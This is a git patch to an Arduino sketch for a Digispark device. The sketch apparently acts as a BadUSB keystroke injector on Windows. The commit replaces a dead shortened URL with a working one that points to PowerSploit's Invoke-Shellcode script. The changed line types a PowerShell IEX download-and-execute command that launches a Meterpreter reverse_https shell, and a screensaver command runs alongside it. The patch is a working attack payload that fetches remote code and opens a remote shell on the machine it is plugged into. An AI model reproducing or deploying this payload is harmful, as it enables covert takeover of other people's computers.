From 914a3e17912e913f45a79794dca8a60c8a9cf456 Mon Sep 17 00:00:00 2001 From: Edmond Major III <1646728+spmedia@users.noreply.github.com> Date: Thu, 9 Feb 2023 23:45:23 -0600 Subject: [PATCH] Update Rapid_Shell.ino Update the dead bitly link to a new working one https://rb.gy/tpyrpt It redirects to https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1 --- Rapid_Shell/Rapid_Shell.ino | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Rapid_Shell/Rapid_Shell.ino b/Rapid_Shell/Rapid_Shell.ino index de19b6b..1650cb6 100644 --- a/Rapid_Shell/Rapid_Shell.ino +++ b/Rapid_Shell/Rapid_Shell.ino @@ -47,7 +47,7 @@ void loop() { DigiKeyboard.delay(500); DigiKeyboard.println("start C:/Windows/System32/Ribbons.scr /s"); DigiKeyboard.delay(250); - DigiKeyboard.println("powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport -Force""); // Edit both Lhost and Lport according to your setup + DigiKeyboard.println("powershell "IEX (New-Object Net.WebClient).DownloadString('https://rb.gy/tpyrpt'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport -Force""); // Edit both Lhost and Lport according to your setup DigiKeyboard.delay(250); DigiKeyboard.sendKeyStroke(KEY_W, MOD_CONTROL_LEFT); // Save the file and return to cmd shell use delay of 500ms DigiKeyboard.sendKeyStroke(KEY_ENTER);